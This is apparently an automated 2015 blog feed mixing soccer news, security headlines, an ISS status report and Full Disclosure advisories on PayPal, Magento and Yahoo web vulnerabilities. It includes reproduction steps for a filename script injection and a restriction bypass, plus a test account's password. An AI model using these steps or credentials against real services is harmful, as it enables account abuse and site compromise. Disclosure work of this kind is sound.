Latest YouTube Video

Saturday, September 12, 2015

Porto wins 3-1 at Arouca in Portugal

LISBON, Portugal (AP) FC Porto eased to a 3-1 win at Arouca to sit atop of the Portuguese league on Saturday.

from FOX Sports Digital http://ift.tt/1Ome54E
via IFTTT

South American football chief backs Copa Centenario in US

MIAMI BEACH, Fla. (AP) The host confederation for next year's Copa America Centenario in the United States still hopes the tournament can be played despite the indictment of nine soccer officials and five businessmen on corruption charges.

from FOX Sports Digital http://ift.tt/1FEufiJ
via IFTTT

Twente and Ajax draw 2-2, PSV thrashes Cambuur 6-0

AMSTERDAM (AP) Ajax's perfect start to the Eredivise ended on Saturday as it drew 2-2 at struggling FC Twente, while defending champion PSV Eindhoven thrashed 10-man Cambuur Leeuwarden 6-0.

from FOX Sports Digital http://ift.tt/1LqmTkC
via IFTTT

I have a new follower on Twitter


InXpress
Dramatically reduce your international shipping costs with InXpress's consolidated shipping volume from thousands of businesses under one umbrella.
Scottsdale Arizona
http://t.co/YTtuvZgDxF
Following: 1939 - Followers: 1288

September 12, 2015 at 05:20PM via Twitter http://twitter.com/DHL_Discounts

Olympiakos remains unbeaten in Greece, beats Platanias 3-1

ATHENS, Greece (AP) Defending champion Olympiakos upheld its perfect start to the Greek league by beating visiting Platanias 3-1 for a third straight win on Saturday.

from FOX Sports Digital http://ift.tt/1EUreQm
via IFTTT

InXpress (@DHL_Discounts) favorited one of your Tweets!

@mistermcguire: [FD] Shopify Bug Bounty #8 - (FilePath) Persistent Vulnerability   InXpress favorited your Tweet. View   Patrick McGuire @mistermcguire =   [FD] Shopify Bug Bounty #8 - (FilePath) Persistent Vulnerability ift.tt/1FBgXDE   Settings | Help | Opt-out | Download app Twitter, Inc. 1355 Market Street, Suite 900 San Francisco, CA 94103

Source: Gmail -> IFTTT-> Blogger

Young migrants applauded by 75,000 fans at Bundesliga game

MUNICH (AP) Young migrants accompanied Bayern Munich players onto the pitch and took center stage to the applause of 75,000 fans before a Bundesliga game on Saturday.

from FOX Sports Digital http://ift.tt/1Kidq2w
via IFTTT

Roma wins 2-0 at Frosinone to move top in Italy

MILAN (AP) Roma provisionally moved top of the Serie A table with a 2-0 win at local rival Frosinone on Saturday, while 10-man Fiorentina beat Genoa 1-0.

from FOX Sports Digital http://ift.tt/1UOoHZV
via IFTTT

These Top 30 Ashley Madison Passwords are just as Terrible as You'd Think

Yes, you heard it correct! First the Password Cracking Team 'CynoSure Prime' cracked more than 11 Million Ashley Madison’s passwords in just 10 days (quite an achievement, though), now a member of the team shares the same list of passwords with few calculations. The calculations are... ...What passwords are mostly used and by how many users? Terrible? <!-- adsense --> Out of 11


from The Hacker News http://ift.tt/1VU5Sqr
via IFTTT

Man City leaves it late to beat Palace 1-0 in Premier League

LONDON (AP) Manchester City maintained its perfect start to the season after a 90th-minute goal from Kelechi Iheanacho earned the Premier League leaders a 1-0 victory at Crystal Palace on Saturday.

from FOX Sports Digital http://ift.tt/1J4Kx4l
via IFTTT

Ronaldo hits 5 goals to become Madrid's top scorer in Liga

BARCELONA, Spain (AP) Cristiano Ronaldo scored five goals to become Real Madrid's all-time leading scorer in the Spanish league in a 6-0 rout at Espanyol on Saturday.

from FOX Sports Digital http://ift.tt/1UKLF9u
via IFTTT

Apple Boosts iOS 9 Security with improved Two-Factor Authentication

Apple iOS 9, codenamed Monarch, will be available to the world on September 16th. While most of the upgrades on iOS 9 focus on making devices: Faster Smarter Secure and more efficient. Today we are going to discuss the improved Two-Factor Authentication (2FA) pumped within the new iOS operating system. WHAT'S NEW AND HOW IT WORKS Apple has strengthened the foundation of iOS 9


from The Hacker News http://ift.tt/1Lq7jpp
via IFTTT

Lyon misses chances in 0-0 draw against resilient Lille

PARIS (AP) Lyon missed the chance to move into provisional second place in the French league after drawing 0-0 against a resilient Lille on Saturday.

from FOX Sports Digital http://ift.tt/1OKt5Hu
via IFTTT

City strikes late after Chelsea slips up in Premier League

LONDON (AP) Manchester City needed a 90th minute winner to beat Crystal Palace 1-0 and secure a fifth consecutive victory this season, while Premier League champion Chelsea slumped to a 3-1 defeat at Everton on a day of contrasts for title hopefuls.

from FOX Sports Digital http://ift.tt/1O7vij9
via IFTTT

Arsenal beats Stoke 2-0 in Premier League

LONDON (AP) Arsenal strikers Theo Walcott and Olivier Giroud scored a goal each Saturday in a 2-0 win over Stoke in the Premier League that still highlighted the team's inefficiency in attack.

from FOX Sports Digital http://ift.tt/1K3oRrl
via IFTTT

Berahino goalless on West Brom return in Southampton draw

WEST BROMWICH, England (AP) Saido Berahino could not find the net on his return for West Bromwich Albion in a dire 0-0 draw with Southampton in the English Premier League on Saturday.

from FOX Sports Digital http://ift.tt/1NorUie
via IFTTT

Watford beats Swansea 1-0 for 1st league win of season

WATFORD, England (AP) Newly promoted Watford won its first Premier League match of the season, beating Swansea 1-0 on Saturday despite being reduced to 10 men.

from FOX Sports Digital http://ift.tt/1K3oUn1
via IFTTT

Ronaldo scores 5 goals as Madrid routs Espanyol 6-0

BARCELONA, Spain (AP) Cristiano Ronaldo scored five goals for Real Madrid for the second time in a 6-0 rout of Espanyol in the Spanish league on Saturday.

from FOX Sports Digital http://ift.tt/1K5c7Tf
via IFTTT

Bayern beats Augsburg 2-1 last minute, Dortmund wins 4-2

MUNICH (AP) Thomas Mueller scored a last-minute penalty for Bayern Munich to beat Augsburg 2-1 and Borussia Dortmund maintained its perfect Bundesliga start by defeating Hannover 4-2 on Saturday.

from FOX Sports Digital http://ift.tt/1OKeXOp
via IFTTT

Young migrants applauded by 75,000 fans before German game

MUNICH (AP) Young migrants accompanied Bayern Munich players onto the pitch and were applauded by 75,000 fans before a Bundesliga game Saturday.

from FOX Sports Digital http://ift.tt/1O7kZM0
via IFTTT

Russia's slowest WCup stadium starts construction

MOSCOW (AP) Construction has finally started on the most delayed of Russia's stadiums for the 2018 World Cup.

from FOX Sports Digital http://ift.tt/1ilG0G2
via IFTTT

Zenit rescues draw against Russian leader CSKA

MOSCOW (AP) Hulk scored as Zenit St. Petersburg bounced back from two goals down to draw 2-2 with leader CSKA Moscow in the Russian Premier League on Saturday.

from FOX Sports Digital http://ift.tt/1K4UQcK
via IFTTT

Hiroshima beats Yamagata 3-1 to take over J-League lead

TOKYO (AP) Brazilian Douglas and Takuma Asano scored second-half goals as Sanfrecce Hiroshima beat Montedio Yamagata 3-1 on Saturday to move into first place in the J-League second stage standings.

from FOX Sports Digital http://ift.tt/1O7a1WF
via IFTTT

LockerPin Ransomware Resets PIN and Permanently Locks Your SmartPhones

Your device's lock screen PIN is believed to keep your phone's contents safe from others, but sadly not from a new piece of ransomware that is capable of hijacking safety of your Android devices. A group of security researchers has uncovered what is believed to be the first real example of malware that is capable to reset the PIN code on a device and permanently lock the owner out of their


from The Hacker News http://ift.tt/1J4vV4Y
via IFTTT

'Gladbach captain Stranzl out 6-8 weeks with facial injury

MOENCHENGLADBACH, Germany (AP) Borussia Moenchengladbach captain Martin Stranzl has undergone an operation on his fractured eye socket and will be ruled out for six to eight weeks.

from FOX Sports Digital http://ift.tt/1M3JHtr
via IFTTT

Here's How to Stop Windows 7 or 8 from Downloading Windows 10 Automatically

Yesterday we reported you that Microsoft is auto-downloading Windows 10 installation files — between 3.5GB and 6GB — onto users' PCs even if they have not opted into the upgrade. Microsoft plans to deploy Windows 10 on over 1 Billion devices worldwide, and this auto-downloading Windows 10 could be one of its many strategies to achieve its goal. The company has dropped and saved a hidden


from The Hacker News http://ift.tt/1UJFL8K
via IFTTT

DESIGNATED RIGHT TURN LANES TO IMPROVE TRAFFICE FLOW.

With very over crowded San Pedro and Wilmington streets a very low cost and effective way to improve the traffic flow throughout the region is to ...

from Google Alert - anonymous http://ift.tt/1Khc2Ny
via IFTTT

A Giant Squid in the Flying Bat


Very faint but also very large on planet Earth's sky, a giant Squid Nebula cataloged as Ou4, and Sh2-129 also known as the Flying Bat Nebula, are both caught in this scene toward the royal constellation Cepheus. Composed with a total of 20 hours of broadband and narrowband data, the telescopic field of view is almost 4 degrees or 8 Full Moons across. Discovered in 2011 by French astro-imager Nicolas Outters, the Squid Nebula's alluring bipolar shape is distinguished here by the telltale blue-green emission from doubly ionized oxygen atoms. Though apparently completely surrounded by the reddish hydrogen emission region Sh2-129, the true distance and nature of the Squid Nebula have been difficult to determine. Still, a recent investigation suggests Ou4 really does lie within Sh2-129 some 2,300 light-years away. Consistent with that scenario, Ou4 would represent a spectacular outflow driven by a triple system of hot, massive stars, cataloged as HR8119, seen near the center of the nebula. If so, the truly giant Squid Nebula would physically be nearly 50 light-years across. via NASA http://ift.tt/1NlcUBL

Orioles Highlight: Baltimore hits 2 grand slams in the 8th inning to put en route to a 14-8 win over the Royals (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Friday, September 11, 2015

[FD] Defense in depth -- the Microsoft way (part 33): arbitrary code execution (and UAC bypass) via RegEdit.exe

Re: [FD] OpenLDAP ber_get_next Denial of Service

Why are they labelling this 'minor' and not issuing a fix? I could use the oneliner in this advisory to kill the vanilla OpenLDAP on my Ubuntu box. Remotely. A remote unauthenticated DoS against a directory server is /not/ minor, IMHO. On 10-09-15 07:34, Denis Andzakovic wrote: > ( , ) (, > . '.' ) ('. ', > ). , ('. ( ) ( > (_,) .'), ) _ _, > / _____/ / _ \ ____ ____ _____ > \____ \= /_\ \ _/ ___\/ _ \ / \ > / \/ | \\ \__( <_> ) Y Y \ > /______ /\___|__ / \___ >____/|__|_| / > \/ \/.-. \/ \/:wq > (x.0) > '=w|.=' > _=''"''=. > > presents.. > OpenLDAP get_ber_next Denial of Service > Affected Versions: OpenLDAP <=.4.42 > > PDF: http://ift.tt/1EZRMzx > >

Source: Gmail -> IFTTT-> Blogger

4th loss in 4 games for 'Gladbach after 3-0 loss to Hamburg

MUNICH (AP) Borussia Moenchengladbach's miserable start to the season continued Friday as Pierre-Michel Lasogga led visiting Hamburg to a 3-0 win in the Bundesliga.

from FOX Sports Digital http://ift.tt/1Lot34M
via IFTTT

South American football chief backs Copa Centenario in US

ASUNCION, Paraguay (AP) The head of South American soccer governing body CONMEBOL tells The Associated Press he backs playing the Copa America's 100th anniversary tournament next year in the United States.

from FOX Sports Digital http://ift.tt/1iD2lyG
via IFTTT

Redirect anonymous users to login when trying to view profile

Accordingly, anonymous users receive the standard warning when trying to view a profile: Sorry but we are not able to provide this at the moment.

from Google Alert - anonymous http://ift.tt/1Qtrbw0
via IFTTT

Premier League clubs to support migrant appeals

LONDON (AP) Premier League clubs will promote a child refugee crisis appeal run by leading charity Save the Children this weekend, while Arsenal will donate one pound ($1.5) from each ticket sold in a response to the migrant crisis from top-flight English teams.

from FOX Sports Digital http://ift.tt/1UHVhlv
via IFTTT

Swiss league pledges cash for goals to refugees charity

BERN, Switzerland (AP) Each goal scored in top Swiss league matches this weekend will earn 500 Swiss francs ($513) for a charity working with refugees.

from FOX Sports Digital http://ift.tt/1FC3yuT
via IFTTT

plone/Products.CMFPlone

Fields related with anonymous users should be side by side #948. Open. hvelarde opened this Issue 24 minutes ago · 1 comment ...

from Google Alert - anonymous http://ift.tt/1UHCUgo
via IFTTT

UEFA adds steroid monitoring to anti-doping program

NYON, Switzerland (AP) UEFA says it has added monitoring of steroid use by players to its biological passport program this season.

from FOX Sports Digital http://ift.tt/1KfCYNG
via IFTTT

Microsoft is Auto-Downloading Windows 10 to PCs, Even If You Don't Want it

Microsoft wholeheartedly wants you to upgrade to Windows 10. So much that even if you have not opted-in for Windows 10 upgrade, you will get it the other way. Surprised? If you have Windows Update enabled on your PCs running Windows 7 or Windows 8.1, you’ll notice a large file — between 3.5GB and 6GB — mysteriously been downloaded to your computer in the background. The huge file


from The Hacker News http://ift.tt/1LnVCiJ
via IFTTT

Slowed by injuries, Giuseppe Rossi agrees to reduce salary

FLORENCE, Italy (AP) After returning from the latest in a series of serious knee injuries, United States-born Italy international Giuseppe Rossi has agreed to reduce his salary at Fiorentina.

from FOX Sports Digital http://ift.tt/1OGRv4M
via IFTTT

Barcelona includes Messi for Atletico match, Pique ruled out

MADRID (AP) Barcelona coach Luis Enrique will be able to count on his first-choice attacking lineup of Lionel Messi, Neymar and Luis Suarez for Saturday's match against Atletico Madrid.

from FOX Sports Digital http://ift.tt/1gf0lKU
via IFTTT

Wolfsburg inviting 1,200 migrants to Champions League game

WOLFSBURG, Germany (AP) Bundesliga runner-up Wolfsburg says it will invite about 1,200 migrants to its opening Champions League game against CSKA Moscow on Tuesday.

from FOX Sports Digital http://ift.tt/1Nm21j9
via IFTTT

Android Stagefright Exploit Code Released

Zimperium Mobile Security Labs (zLabs) have been working hard to make Android operating system more safe and secure to use. Zimperium team has publicly released the CVE-2015-1538 Stagefright Exploit, demonstrating the process of Remote Code Execution (RCE) by an attacker. The released exploit is a python code creating an MP4 exploiting the ‘stsc’ vulnerability dubbed Stagefright. <!--


from The Hacker News http://ift.tt/1ULiMos
via IFTTT

Czech defender Limbersky loses club captaincy after crash

PRAGUE (AP) Czech Republic defender David Limbersky was stripped of the captaincy of Viktoria Plzen on Friday, a day after he allegedly drove into a fence in Prague and tried to flee.

from FOX Sports Digital http://ift.tt/1K0qJkr
via IFTTT

FIFA probes complaint into Chelsea loan of Salah to Roma

ZURICH (AP) FIFA is investigating Mohamed Salah's move to Roma in a breach of contract case which could threaten Chelsea with a transfer ban.

from FOX Sports Digital http://ift.tt/1K0qJkn
via IFTTT

De Gea in spotlight as Man United faces Liverpool

LONDON (AP) After the failed move to Real Madrid, goalkeeper David De Gea is finally set to make his first appearance of the season for Manchester United on Saturday against old rival Liverpool.

from FOX Sports Digital http://ift.tt/1ULfn9a
via IFTTT

ISS Daily Summary Report – 09/10/15

Human Research Program (HRP) Operations: Salivary Markers: Yui collected saliva and urine samples in support of his FD 90 Salivary Markers and inserted them into MELFI.  Salivary Markers samples will be used to measure markers of latent viral reactivation (a global indicator of immune impairment and infection risk) in conjunction with salivary antimicrobial proteins and immune cell functional assays. This research study will help identify if there are any risks of an adverse health event in crewmembers due to an impaired immune system. Maintaining a robust immune system during prolonged spaceflight missions (i.e., to other planets or asteroids) will be important to ensure mission success. If any impairment in immunity is found due to spaceflight, this will allow the development of appropriate countermeasures to help mitigate the risks.   Synchronized Position Hold, Engage, Reorient, Experimental Satellites (SPHERES) Slosh:  Kelly performed the third SPHERES Slosh session of Increment 43/44.  With assistance from ground teams, Kelly followed the uplinked test plan and worked through eight different objectives.  Lindgren setup and recorded the sessions using both the IMAX and 3DA1 Cameras.  The SPHERES-Slosh investigation uses small robotic satellites to examine how liquids move around inside containers in microgravity. A water bottle’s contents slosh around differently in space than on Earth, but the physics of liquid motion in microgravity are not well understood, which affects computer simulations of liquid rocket fuel behavior. Middle school and high school students control the SPHERES to study how liquids behave inside containers in space, which increases the safety and efficiency of future rockets.   Ryutai Reconfiguration: Yui reconfigured the Solution Crystallization Observation Facility (SCOF) within the Ryutai rack in preparation for the next session of Soret Facet scheduled for Increment 45.  The Soret effect in fluids is a thermodynamic phenomenon in which different particles respond in different ways to varying temperatures. The effect, studied by the Swiss chemist Charles Soret, has been difficult to examine in detail on Earth because of gravity. The Study on Soret effect (thermal diffusion process) for the mixed solution by the in-situ observation technique facilitated at SCOF (Soret-Facet) is the first investigation to verify Soret conditions in steady and changing conditions, and to compare the Soret effect in microgravity with results on the ground, an important measurement for calibrating future investigations.   Node 3 Carbon Dioxide Removal Assembly (CDRA) Anomaly:  Yesterday evening, the Node 3 CDRA pump experienced an anomaly at the beginning of segment 2 during Half Cycle 2. This anomaly had been seen before in February of this year. Ground team’s power cycled the Pump/Fan Motor Controller (PFMC) in order to recover from the problem. At this time Node 3 and Lab CDRAs are operating nominally and CO2 levels are within acceptable limits.   ESA Short Duration Mission Muscle Atrophy Research and Exercise System (MARES): Commissioning Day#2 is complete and the hardware has been restowed. The team has experienced issues with LAN cable connectivity between EPM laptop and MARES Main Box End stop over‐travel detection during the use of PEMS and EMG. MARES is a physiological research facility that will be used to carry out research on musculoskeletal, biomechanical, and neuromuscular human physiology. The Commissioning Part#2 is the last step in this research rack check‐out activities. Its main goal is the performance of an integrated man‐in‐the‐loop technical protocol which characterizes all MARES subsystems and associated auxiliary measurement devices (ultrasound, electrical muscle stimulation and electromyogram).   MELONDAU: yesterday DEMES tasting session#5 was completed nominally, session #6 (and final session) was completed earlier today.  Current status of MCA/AQM measurements: ‐ MCA measurements have been received by BIOTESC for GMT 248 to 250, and GMT 251 files are pending. ‐ AQM: confirmed that we have NO measurements for either for GMT 248 or 249. GMT 250, some files were acquired with AQM in speed mode (rather than autorun mode). GMT 251, the same speed mode was used. Long‐distance and long‐term human space travel will only be possible with adequate life support systems in place, allowing extensive recycling of water and the in situ production of oxygen and food, with closed regenerative systems the most ideal way of reducing launch mass and costs. MELONDAU is a significant precursor flight experiment which will verify the recovery of biological processes of selected micro‐organisms, test a microfluid system essential for the overall monitoring and control of a closed regenerative life support system, and verify the acceptability of snacks composed of Micro‐Ecological Life Support System Alternative (MELiSSA) ingredients. This is a first step to enable the successful deployment of ESA’s MELiSSA system in space in the future.   MOBI‐PV: yesterday, Mogensen unstowed the MOBI-PV equipment. A missing USB adapter cable was found later in the day, and all the planned MOBI‐PV activities (i.e. smartphones battery charging) could be completed.  The current ISS laptop‐based crew information system has certain drawbacks with respect to operator mobility and user interface options. The mobiPV experiment will demonstrate new technologies and operations concepts for ISS crew procedure execution, both for onboard crew, and ground teams, offering wireless operation, voice navigation and real time (over the shoulder) video streaming of workplace activities and synchronized in‐flight/on ground procedure execution. The mobiPV system could be deployed for future crew procedures and contingency operations with a potential to significantly shorten anomaly processing and resolution.   EPO IrISS: Mogensen completed three EPO scripts from the Cupola.  The need for education in an ever‐increasing knowledge based society is without question and education forms a fundamental part of the mandate of the European Space Agency (ESA). The EPO IrISS set of education activities aims to introduce the concept of microgravity and human spaceflight to European children and students ranging from primary to tertiary level education. The activities related to this project are intended to stimulate the curiosity of students and to motivate them towards STEM (Science, Technology, Engineering and Mathematics) subjects as well as to bring awareness to the younger generation of the importance of the ISS as a testing bed for future exploration activities in space.   ENDOTHELIAL CELLS: KUBIK FM5 […]

from ISS On-Orbit Status Report http://ift.tt/1Ntmowr
via IFTTT

AP Photos: 2018 World Cup host Russia looks for future stars

MOSCOW (AP) As Russia prepares to host the 2018 World Cup, it is already looking to a future generation of soccer stars.

from FOX Sports Digital http://ift.tt/1Mge8Q1
via IFTTT

[FD] [KIS-2015-04] Magento <= 1.9.2 (catalogProductCreate) Autoloaded File Inclusion Vulnerability

---------------------------------------------------------------------------

Source: Gmail -> IFTTT-> Blogger

Health Insurer Excellus Hacked; 10.5 Million Records Breached

Health Care Hacks —  he choice of hackers this year! In a delayed revelation made by Excellus BlueCross BlueShield (BCBS), which says that about 10.5 Millions of their clients' data and information has been compromised by hackers. Excellus BCBS headquartered in Rochester, New York, provides finance and health care services across upstate New York and long-term care insurance nationwide.


from The Hacker News http://ift.tt/1FBcOzq
via IFTTT

[FD] PayPal Inc - Security Approval & 2FA Session Auth Bypass (API) Vulnerability

Document Title: =============== PayPal Inc - Security Approval & 2FA Session Auth Bypass (API) Vulnerability References (Source): ==================== http://ift.tt/1JBcftp Video: http://ift.tt/1Krnzf9 Watch Video: https://www.youtube.com/watch?v=Gzq8TD2Co9Y EIBBP-31865 Vulnerability Magazine: http://ift.tt/1KrpSig http://ift.tt/1O2mJoS http://ift.tt/1K2cZsM http://ift.tt/1iBXCgz http://ift.tt/1EOHMcn http://ift.tt/1iBXCgB... Release Date: ============= 2015-09-02 Vulnerability Laboratory ID (VL-ID): ==================================== 1486 Common Vulnerability Scoring System: ==================================== 6.1 Product & Service Introduction: =============================== PayPal is a global e-commerce business allowing payments and money transfers to be made through the Internet. Online money transfers serve as electronic alternatives to paying with traditional paper methods, such as checks and money orders. Originally, a PayPal account could be funded with an electronic debit from a bank account or by a credit card at the payer s choice. But some time in 2010 or early 2011, PayPal began to require a verified bank account after the account holder exceeded a predetermined spending limit. After that point, PayPal will attempt to take funds for a purchase from funding sources according to a specified funding hierarchy. If you set one of the funding sources as Primary, it will default to that, within that level of the hierarchy (for example, if your credit card ending in 4567 is set as the Primary over 1234, it will still attempt to pay money out of your PayPal balance, before it attempts to charge your credit card). The funding hierarchy is a balance in the PayPal account; a PayPal credit account, PayPal Extras, PayPal SmartConnect, PayPal Extras Master Card or Bill Me Later (if selected as primary funding source) (It can bypass the Balance); a verified bank account; other funding sources, such as non-PayPal credit cards. The recipient of a PayPal transfer can either request a check from PayPal, establish their own PayPal deposit account or request a transfer to their bank account. PayPal is an acquirer, performing payment processing for online vendors, auction sites, and other commercial users, for which it charges a fee. It may also charge a fee for receiving money, proportional to the amount received. The fees depend on the currency used, the payment option used, the country of the sender, the country of the recipient, the amount sent and the recipient s account type. In addition, eBay purchases made by credit card through PayPal may incur extra fees if the buyer and seller use different currencies. On October 3, 2002, PayPal became a wholly owned subsidiary of eBay. Its corporate headquarters are in San Jose, California, United States at eBay s North First Street satellite office campus. The company also has significant operations in Omaha, Nebraska, Scottsdale, Arizona, and Austin, Texas, in the United States, Chennai, Dublin, Kleinmachnow (near Berlin) and Tel Aviv. As of July 2007, across Europe, PayPal also operates as a Luxembourg-based bank. On March 17, 2010, PayPal entered into an agreement with China UnionPay (CUP), China s bankcard association, to allow Chinese consumers to use PayPal to shop online.PayPal is planning to expand its workforce in Asia to 2,000 by the end of the year 2010. (Copy of the Homepage: www.paypal.com) [http://ift.tt/rooU27] Abstract Advisory Information: ============================== The Vulnerability Laboratory Core Research Team discovered a restriction filter bypass in the official PayPal Inc Mobile API for Apple iOS. Vulnerability Disclosure Timeline: ================================== 2015-04-30: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security GmbH) 2015-05-02: Vendor Notification (PayPal Inc - Security & Bug Bounty Team) 2015-05-13: Vendor Response/Feedback (PayPal Inc - Security & Bug Bounty Team) 2015-**-**: Vendor Fix/Patch (PayPal Inc - Developer Team) 2015-09-02: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== PayPal Inc Product: Mobile Web Application (API) 2015 Q2 Exploitation Technique: ======================= Remote Severity Level: =============== High Technical Details & Description: ================================ By processing multiple login we saw a bug in the mobile app api next to the identity check. Normally an user account logs in and if the account is restricted by several requests a stable form popup to call paypal or write a ticket mail. By processing to request the form multiple times with an existing account (x01445@gmail.com:chaos666) we was able to bypass the auth verification check to approve the account owner. The api loads the website context and the user is able to include inside of the identity check with a browser engine the own user account. Even if the account is restricted the user can access via mobile api with the exisiting cookies. The security identity check to approve has been included to verify that no user logs in to unauthorized- or restricted accounts. In that case we demonstrate in the video how we bypass the validation and how it should look normally with the final request. Proof of Concept (PoC): ======================= The security vulnerability can be exploited by remote attackers with low privileged application user account and without user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. The video demonstrates a flaw inside of the mobile app api that redirects an user account with restricted credentials inside of the app to the original website source. The cookies authorize the account to login even if the regular portal denies it because of the identity approval. The issue is not connected to the 6 month ago reported restriction bypass and reveals a signifanct risk to user accounts because of fraud and account theft. The video deomstrates a security bug in the official paypal mobile ios api. The bug allows to bypas the account restriction by usage of a validation flaw inside of the service. The identity check approves restricted user accounts. In the first released issue we demonstrated how to bypass the auth. In case of the new issue the researcher demonstrates how to bypass the identity check that approves the paypal account. The attacker bypass the validation by multiple requests and dumps the real website for login inside the app with cookies and co. Video Demonstration: https://www.youtube.com/watch?v=Gzq8TD2Co9Y Solution - Fix & Patch: ======================= The vulnerability can be patched by a secure redirect of a multi requesting source to the main mobile api. Disallow to load the website context with the app cookies after a successful login through a restricted account to prevent. Security Risk: ============== The security risk of the remote mobile api identity approval check bypass is estimated as high. (CVSS 6.1) Credits & Authors: ================== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [http://ift.tt/1jnqRwA] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: http://ift.tt/1jnqRwA - www.vuln-lab.com - http://ift.tt/1kouTut Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - http://ift.tt/1zNuo47 - http://ift.tt/1wo6y8x Social: http://twitter.com/#!/vuln_lab - http://ift.tt/1kouSqa - http://youtube.com/user/vulnerability0lab Feeds: http://ift.tt/1iS1DH0 - http://ift.tt/1kouSqh - http://ift.tt/1kouTKS Programs: http://ift.tt/1iS1GCs - http://ift.tt/1iS1FyF - http://ift.tt/1kouSqp Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™

Source: Gmail -> IFTTT-> Blogger

[FD] Magento Bug Bounty #19 - Persistent Filename Vulnerability

Document Title: =============== Magento Bug Bounty #19 - Persistent Filename Vulnerability References (Source): ==================== http://ift.tt/1F14u0T ID: APPSEC-1059 Release Date: ============= 2015-09-11 Vulnerability Laboratory ID (VL-ID): ==================================== 1570 Common Vulnerability Scoring System: ==================================== 3.9 Product & Service Introduction: =============================== Magento is an open source e-commerce web application that was launched on March 31, 2008 under the name Bento. It was developed by Varien (now Magento, a division of eBay) with help from the programmers within the open source community but is now owned solely by eBay Inc. Magento was built using parts of the Zend Framework. It uses the entity-attribute-value (EAV) database model to store data. In November 2013, W3Techs estimated that Magento was used by 0.9% of all websites. Our team of security professionals works hard to keep Magento customer information secure. What`s equally important to protecting this data? Our security researchers and user community. If you find a site that isn`t following our policies, or a vulnerability inside our system, please tell us right away. ( Copy of the Vendor Homepage: http://ift.tt/1E22539 & http://ift.tt/1E22539 ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Research Team discovered an application-side file input validation web vulnerability in the official Magento Commerce online service web-application. Vulnerability Disclosure Timeline: ================================== 2015-08-13: Researcher Notification & Coordination (Hadji Samir - Evolution Security GmbH) 2015-08-14: Vendor Notification (Magento Security Team - Bug Bounty Program) 2015-08-22: Vendor Response/Feedback (Magento Security Team - Bug Bounty Program) 2015-09-05: Vendor Fix/Patch (Magento Developer Team) 2015-09-10: Bug Bounty Reward (Magento Security Team - Bug Bounty Program) 2015-09-11: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ An application-side web vulnerability has been discovered in the official Magento Commerce online service web-application. The vulnerability allows an remote attacker to inject own script code to the application-side of the affected application module. The web vulnerability is located in the `filename and files` value of the `/products/bug-tracking/report/saveIssue/` module. Remote attackers are able to inject own files with malicious `files & filename` value via `upload` POST method request to compromise the magento commerce web-application. Remote attackers are also able to exploit the filename issue in combination with persistent injected script codes to execute different malicious attack requests. The attack vector is located on the application-side of the magento service and the request method to inject is POST. The issue is remotly exploitable after approval with two test accounts. The sender and receiver of the ticket is affected by the issue itself. Another issue is that the filename upload has no secure restriction of the name value. Thus can result in upload of multiple malicious file extensions to remotly elevate user privileges by malicious interaction. (arbitrary file upload - multiple extensions) The security risk of the application-side web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.9. Exploitation of the application-side validation web vulnerability requires no user interaction and only a low privileged web-application user account. Successful exploitation of the security vulnerability results in the ubnt community web-application compromise. Request Method(s): [+] [POST] Vulnerable Domain(s): [+] http://ift.tt/gRsn9E Vulnerable Module(s): [+] /products/bug-tracking/report/saveIssue/ Vulnerable Parameter(s): [+] filename [+] files Affected Module(s): [+] /saveIssue/ Proof of Concept (PoC): ======================= The vulnerability can be exploited by remote attackers with low privilege application user account and only low user interaction (click). For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability ... 1. Login in magento website 2. Go to http://ift.tt/1QsB1OW 3. Create to Report an Issues 4. Upload a file with a payload script code (code injection) as filename via POST 5. Report the issue and the payload code will execute 6. Successful reproduce of the remote vulnerability in the filename value! PoC: Source
Attachments: ">


Leave your comments

Upload Files



Source: Gmail -> IFTTT-> Blogger

[FD] Shopify Bug Bounty #8 - (FilePath) Persistent Vulnerability

[FD] Yahoo Bug Bounty #32 - Cross Site Request Forgery bulkImport Web Vulnerability

Document Title: =============== Yahoo Bug Bounty #32 - CSRF bulkImport Web Vulnerability References (Source): ==================== http://ift.tt/1KLqj5B Release Date: ============= 2015-09-03 Vulnerability Laboratory ID (VL-ID): ==================================== 1552 Common Vulnerability Scoring System: ==================================== 3.8 Product & Service Introduction: =============================== Yahoo! Inc. is an American multinational internet corporation headquartered in Sunnyvale, California. It is widely known for its web portal, search engine Yahoo! Search, and related services, including Yahoo! Directory, Yahoo! Mail, Yahoo! News, Yahoo! Finance, Yahoo! Groups, Yahoo! Answers, advertising, online mapping, video sharing, fantasy sports and its social media website. It is one of the most popular sites in the United States. According to news sources, roughly 700 million people visit Yahoo! websites every month. Yahoo! itself claims it attracts `more than half a billion consumers every month in more than 30 languages. (Copy of the Vendor Homepage: http://www.yahoo.com ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Core Research Team discovered a script code inject web vulnerability in the official 